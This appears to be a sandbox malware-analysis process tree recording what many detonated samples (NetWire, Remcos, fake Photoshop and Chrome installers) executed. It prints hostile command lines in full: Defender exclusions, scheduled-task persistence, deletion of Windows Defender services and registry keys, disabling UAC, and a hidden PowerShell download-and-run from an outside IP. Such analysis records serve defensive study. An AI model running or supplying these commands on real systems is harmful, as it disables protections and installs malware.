    - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        5⤵
        
        PID:4348
      - C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe"
        6⤵
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        7⤵
        
        PID:5652
        
        C:\Windows\system32\mode.com
        
        mode 65,10
        8⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p1697420900235384164176743894 -oextracted
        8⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        8⤵
        
        PID:3300
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        8⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        8⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        8⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        8⤵
        
        PID:4928
        
        C:\Windows\system32\attrib.exe
        
        attrib +H "svchosts64.exe"
        8⤵
        Views/modifies file attributes
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\main\svchosts64.exe
        
        "svchosts64.exe"
        8⤵
        
        PID:1988
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        9⤵
        
        PID:6936
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "75lRNmd2.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\txBNxbxCQmusdqX\75lRNmd2.exe.exe"' & exit
        10⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "75lRNmd2.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\txBNxbxCQmusdqX\75lRNmd2.exe.exe"'
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\txBNxbxCQmusdqX\75lRNmd2.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName '75lRNmd2.exe-3612' -RunLevel Highest "
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7880
      - C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe"
        6⤵
        
        PID:4996
      - C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
        6⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
        7⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"' & exit
        8⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'dJ3H492fymd.exe-942' -RunLevel Highest "
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3636
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 504
        7⤵
        Program crash
        
        PID:5592
      - C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe"
        6⤵
        
        PID:5400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PhotoshopSetup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHostsss'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHostsss'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8144
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AggregatorHostsss" /tr "C:\Users\Admin\AppData\Roaming\AggregatorHostsss"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6180
      - C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe"
        6⤵
        
        PID:5832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RtkAudUService64.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3068
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB903.tmp.bat""
        7⤵
        
        PID:4072
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:3904
      - C:\Users\Admin\AppData\Local\Temp\a\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\system.exe"
        6⤵
        
        PID:4260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\system.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7228
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6308
      - C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe"
        6⤵
        
        PID:468
      - C:\Users\Admin\AppData\Local\Temp\a\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\loader.exe"
        6⤵
        
        PID:4948
      - C:\Users\Admin\AppData\Local\Temp\a\01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\01.exe"
        6⤵
        
        PID:2560
      - C:\Users\Admin\AppData\Local\Temp\a\ori.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\ori.exe"
        6⤵
        
        PID:5368
      - C:\Users\Admin\AppData\Local\Temp\a\we.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\we.exe"
        6⤵
        
        PID:6136
      - C:\Users\Admin\AppData\Local\Temp\a\rem.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
        6⤵
        
        PID:6452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 704
        7⤵
        Program crash
        
        PID:8316
      - C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe"
        6⤵
        
        PID:7012
        
        C:\Windows\TEMP\{7EFC0B5C-5407-4A01-A9D8-F9AD31A41A5B}\.cr\xmsn.exe
        
        "C:\Windows\TEMP\{7EFC0B5C-5407-4A01-A9D8-F9AD31A41A5B}\.cr\xmsn.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe" -burn.filehandle.attached=188 -burn.filehandle.self=184
        7⤵
        
        PID:7052
        
        C:\Windows\TEMP\{053E76E5-B6E1-46EF-B974-DE033A41F558}\.ba\msn.exe
        
        C:\Windows\TEMP\{053E76E5-B6E1-46EF-B974-DE033A41F558}\.ba\msn.exe
        8⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
        
        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
        9⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        10⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
        
        C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
        11⤵
        
        PID:7344
      - C:\Users\Admin\AppData\Local\Temp\a\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\apple.exe"
        6⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9F2.tmp\E9F3.tmp\E9F4.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        8⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        9⤵
        
        PID:3436
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F299.tmp\F29A.tmp\F29B.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        10⤵
        
        PID:6328
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:3220
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:3716
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:8468
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:8708
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:9160
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9136
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9112
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:9068
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2012
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:8748
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:6572
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:8704
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:8732
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        
        PID:8588
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:8768
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        
        PID:6564
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:8860
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:8760
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:6484
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3740
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        
        PID:1940
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3876
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5052
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:8984
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4572
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5972
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:4684
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3268
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:8236
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:8260
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:6232
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:7996
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:2604
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:6004
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5732
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:7396
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:6208
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5756
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4360
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4840
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        
        PID:9060
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:3180
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:7704
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:8944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:5168
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        
        PID:4200
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4948
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:5720
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:2648
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5904
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:5436
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        
        PID:5752
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3816
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:6884
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:7288
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:7688
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:6016
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5708
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:752
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:3920
      - C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe"
        6⤵
        
        PID:4632
      - C:\Users\Admin\AppData\Local\Temp\a\Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Service.exe"
        6⤵
        
        PID:7772
      - C:\Users\Admin\AppData\Local\Temp\a\bnoaprihjatuasss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\bnoaprihjatuasss.exe"
        6⤵
        
        PID:8040
      - C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe"
        6⤵
        
        PID:5212
      - C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
        6⤵
        
        PID:4600
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5712
        
        C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe"
        7⤵
        
        PID:8608
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8756
      - C:\Users\Admin\AppData\Local\Temp\a\Build104.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Build104.exe"
        6⤵
        
        PID:6384
- - C:\Users\Admin\AppData\Local\Temp\malware.exe
    "C:\Users\Admin\AppData\Local\Temp\malware.exe"
    3⤵
    PID:2204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 56
      4⤵
      Program crash
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
    "C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
    "C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
    3⤵
    PID:3132
- - C:\Users\Admin\AppData\Local\Temp\NetWire.exe
    "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
    3⤵
    PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\NetWire.exe
      "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
      4⤵
      PID:3444
- - C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
    "C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
    3⤵
    PID:3212
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1116
      4⤵
      Program crash
      PID:5160
- - C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
    "C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
    3⤵
    PID:3316
- - C:\Users\Admin\AppData\Local\Temp\Remcos.exe
    "C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
    3⤵
    PID:3344
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:3412
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2216
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
      4⤵
      PID:3676
    - - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3196
    - - C:\Windows\SysWOW64\Userdata\Userdata.exe
        
        "C:\Windows\SysWOW64\Userdata\Userdata.exe"
        5⤵
        
        PID:4944
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:5028
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        Modifies registry key
        
        PID:6096
      - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        6⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        
        PID:4876
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        Modifies registry key
        
        PID:5608
- - C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
    "C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn SFcJ5mayRHd /tr "mshta C:\Users\Admin\AppData\Local\Temp\vIUZK9jrL.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:3240
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn SFcJ5mayRHd /tr "mshta C:\Users\Admin\AppData\Local\Temp\vIUZK9jrL.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3820
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\vIUZK9jrL.hta
      4⤵
      PID:2400
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GTJXQ4EPBLH8ZMURUIOKYKKWAZ53TFAY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3640
      - C:\Users\Admin\AppData\Local\TempGTJXQ4EPBLH8ZMURUIOKYKKWAZ53TFAY.EXE
        
        "C:\Users\Admin\AppData\Local\TempGTJXQ4EPBLH8ZMURUIOKYKKWAZ53TFAY.EXE"
        6⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        7⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
        8⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        9⤵
        
        PID:4580
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE8E.tmp\BE8F.tmp\BE90.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        10⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        11⤵
        
        PID:7612
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C84E.tmp\C84F.tmp\C850.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        12⤵
        
        PID:7844
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        13⤵
        Launches sc.exe
        
        PID:6188
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        13⤵
        Launches sc.exe
        
        PID:6216
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        13⤵
        Delays execution with timeout.exe
        
        PID:6240
        
